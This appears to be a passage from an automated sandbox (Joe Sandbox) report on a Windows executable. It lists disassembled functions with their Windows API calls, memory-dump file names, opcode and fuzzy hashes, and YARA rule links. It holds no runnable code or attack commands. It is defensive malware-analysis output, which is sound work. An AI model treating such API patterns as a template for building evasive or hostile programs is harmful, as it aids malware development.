                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: IconLoad
                                                                                                                                                  • String ID: blank$info$question$stop$warning
                                                                                                                                                  • API String ID: 2457776203-404129466
                                                                                                                                                  • Opcode ID: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
                                                                                                                                                  • Instruction ID: 1734436af2ca56e59899cd3bdf017f39c547290e8d4403808a282f24c331c6a5
                                                                                                                                                  • Opcode Fuzzy Hash: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
                                                                                                                                                  • Instruction Fuzzy Hash: F211F631348386BAE7249E55DC42DAF679C9F15365B20002FF90066281FAFC5E4956AE
                                                                                                                                                  Function 004642F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00464312
                                                                                                                                                  • LoadStringW.USER32(00000000), ref: 00464319
                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0046432F
                                                                                                                                                  • LoadStringW.USER32(00000000), ref: 00464336
                                                                                                                                                  • _wprintf.LIBCMT ref: 0046435C
                                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0046437A
                                                                                                                                                  Strings
                                                                                                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00464357
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                  • API String ID: 3648134473-3128320259
                                                                                                                                                  • Opcode ID: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
                                                                                                                                                  • Instruction ID: 8e316eae760c98dab52acacd6546c6ae495e9062239688ff7a3f09ebd5f77a5e
                                                                                                                                                  • Opcode Fuzzy Hash: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
                                                                                                                                                  • Instruction Fuzzy Hash: CB0167F2900208BFD751AB90DD89EFB776CEB08301F5009B6BB45E2151FA785E894B79
                                                                                                                                                  Function 0048D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 0048D47C
                                                                                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 0048D49C
                                                                                                                                                  • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0048D6D7
                                                                                                                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0048D6F5
                                                                                                                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0048D716
                                                                                                                                                  • ShowWindow.USER32(00000003,00000000), ref: 0048D735
                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0048D75A
                                                                                                                                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 0048D77D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1211466189-0
                                                                                                                                                  • Opcode ID: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
                                                                                                                                                  • Instruction ID: 2f618d94a1d43a989375790be64f9a6bb81cc316bd664b93e4dd4f842dd9a18d
                                                                                                                                                  • Opcode Fuzzy Hash: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
                                                                                                                                                  • Instruction Fuzzy Hash: 2EB1AE71901219EFDF14EF68C9857AE7BB1BF04701F08847AEC48AB295E738A950CB54
                                                                                                                                                  Function 00402A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 00402ACF
                                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00402B17
                                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C21A
                                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C286
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ShowWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1268545403-0
                                                                                                                                                  • Opcode ID: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
                                                                                                                                                  • Instruction ID: 9bc26204a44dec3219c5fdbddb2daa96843464872a345c1f9b74dd9d2987fb79
                                                                                                                                                  • Opcode Fuzzy Hash: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
                                                                                                                                                  • Instruction Fuzzy Hash: 514111307046809ADF755B298ECCB6F7791AB45304F14887FE047B26E0CABDA846DB2D
                                                                                                                                                  Function 004670C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 004670DD
                                                                                                                                                    • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                                                                                                                    • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00467114
                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00467130
                                                                                                                                                  • _memmove.LIBCMT ref: 0046717E
                                                                                                                                                  • _memmove.LIBCMT ref: 0046719B
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 004671AA
                                                                                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004671BF
                                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 004671DE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 256516436-0
                                                                                                                                                  • Opcode ID: 018c4ff2442bdeeb833c233aee01cbefa1d75c6b59dffdef8a5d4bd758a3c7f1
                                                                                                                                                  • Instruction ID: 188a4d0b29229593a2b146342a062b1bd5409cf6fda6c026f11dbcde1a99e618
                                                                                                                                                  • Opcode Fuzzy Hash: 018c4ff2442bdeeb833c233aee01cbefa1d75c6b59dffdef8a5d4bd758a3c7f1
                                                                                                                                                  • Instruction Fuzzy Hash: F131A131A00215EBCF00DFA5DC85AAFB7B8EF45714F1441BAF9049B246EB349E14CBA9
                                                                                                                                                  Function 004861D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 004861EB
                                                                                                                                                  • GetDC.USER32(00000000), ref: 004861F3
                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004861FE
                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0048620A
                                                                                                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00486246
                                                                                                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00486257
                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0048902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00486291
                                                                                                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004862B1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3864802216-0
                                                                                                                                                  • Opcode ID: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
                                                                                                                                                  • Instruction ID: f4278305449edce2f76c410d332ec57268d6ee35a6a277c822a0a6189647fcfb
                                                                                                                                                  • Opcode Fuzzy Hash: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
                                                                                                                                                  • Instruction Fuzzy Hash: 46317172101210BFEB115F50DC4AFEB3BADEF49755F0540A9FE08AA291D6759C41CB68
                                                                                                                                                  Function 0046EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                                                                                    • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                                                                                    • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                                                                                                  • _wcstok.LIBCMT ref: 0046EC94
                                                                                                                                                  • _wcscpy.LIBCMT ref: 0046ED23
                                                                                                                                                  • _memset.LIBCMT ref: 0046ED56
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                                  • String ID: X
                                                                                                                                                  • API String ID: 774024439-3081909835
                                                                                                                                                  • Opcode ID: c91ed4c1db3eaf160e6426a3c9cbafba05b6d1eebd81997a596445fd3a2e4ee9
                                                                                                                                                  • Instruction ID: da02439699827519884de0a837ef4d7055a253f99ddb834d536b4edba3b8eab3
                                                                                                                                                  • Opcode Fuzzy Hash: c91ed4c1db3eaf160e6426a3c9cbafba05b6d1eebd81997a596445fd3a2e4ee9
                                                                                                                                                  • Instruction Fuzzy Hash: E1C161756083019FD714EF25D841A5AB7E4FF85318F10492EF899A72A2EB38EC45CB4B
                                                                                                                                                  Function 00401424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
                                                                                                                                                  • Instruction ID: a887e684d243743618d1057532b585a7ad503945d0d011121e70032f0d2e3d72
                                                                                                                                                  • Opcode Fuzzy Hash: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
                                                                                                                                                  • Instruction Fuzzy Hash: 85715F30900109EFDB04DF95CC89EBF7B75FF85314F14816AF915AA2A1C738AA51CBA9
                                                                                                                                                  Function 00476B76 Relevance: 10.7, APIs: 7, Instructions: 212COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 1dc866799483a1f68d16bd5c587667066af38cf8e711f2f009e96328f63279f3
                                                                                                                                                  • Instruction ID: 46b4ac146fbb0665a2833e9d76511dd6af63fa3af31f170c7a92b4824a30796f
                                                                                                                                                  • Opcode Fuzzy Hash: 1dc866799483a1f68d16bd5c587667066af38cf8e711f2f009e96328f63279f3
                                                                                                                                                  • Instruction Fuzzy Hash: 4561C871204700AFC710EB25CC41EAFB7A9EF84718F40892EF545A72D2DB38AD05C75A
                                                                                                                                                  Function 0048B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • IsWindow.USER32(00B834B0), ref: 0048B3EB
                                                                                                                                                  • IsWindowEnabled.USER32(00B834B0), ref: 0048B3F7
                                                                                                                                                  • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0048B4DB
                                                                                                                                                  • SendMessageW.USER32(00B834B0,000000B0,?,?), ref: 0048B512
                                                                                                                                                  • IsDlgButtonChecked.USER32(?,?), ref: 0048B54F
                                                                                                                                                  • GetWindowLongW.USER32(00B834B0,000000EC), ref: 0048B571
                                                                                                                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0048B589
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4072528602-0
                                                                                                                                                  • Opcode ID: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
                                                                                                                                                  • Instruction ID: 3cfba568ea5790526d5b286793119b4d477072028a14d6832b16bbf893ccb4d1
                                                                                                                                                  • Opcode Fuzzy Hash: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
                                                                                                                                                  • Instruction Fuzzy Hash: 9B71BF34601604EFDB21AF54CC95FBF7BA9EF09700F14486EE941973A2C739A891DB98
                                                                                                                                                  Function 0047F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 0047F448
                                                                                                                                                  • _memset.LIBCMT ref: 0047F511
                                                                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 0047F556
                                                                                                                                                    • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                                                                                    • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                                                                                    • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                                                                                                  • GetProcessId.KERNEL32(00000000), ref: 0047F5CD
                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0047F5FC
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                                                                                  • String ID: @
                                                                                                                                                  • API String ID: 3522835683-2766056989
                                                                                                                                                  • Opcode ID: bc3d410e87ac89b06d51cd0e3322e6ce41cf3a0caf3fdd3db083c5eeea97c555
                                                                                                                                                  • Instruction ID: 5c1dd39b7f321ddcc7bcc10d078eb251a602d9f768a890d439a18523313ae713
                                                                                                                                                  • Opcode Fuzzy Hash: bc3d410e87ac89b06d51cd0e3322e6ce41cf3a0caf3fdd3db083c5eeea97c555
                                                                                                                                                  • Instruction Fuzzy Hash: 3B61B1B1A006189FCB04EF55C48099EB7F5FF48314F14846EE819BB392CB38AD45CB88
                                                                                                                                                  Function 00460F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetParent.USER32(?), ref: 00460F8C
                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00460FA1
                                                                                                                                                  • SetKeyboardState.USER32(?), ref: 00461002
                                                                                                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 00461030
                                                                                                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 0046104F
                                                                                                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00461095
                                                                                                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 004610B8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 87235514-0
                                                                                                                                                  • Opcode ID: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
                                                                                                                                                  • Instruction ID: d8e1dc28bdc088eb6cbc7413f3b60f262c6bc769533ec748a7a92d83500406ea
                                                                                                                                                  • Opcode Fuzzy Hash: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
                                                                                                                                                  • Instruction Fuzzy Hash: 5F51D1A05046D53DFB3642348C15BBBBEA95B06304F0C898EE1D4959E3E2DDDCC8D75A
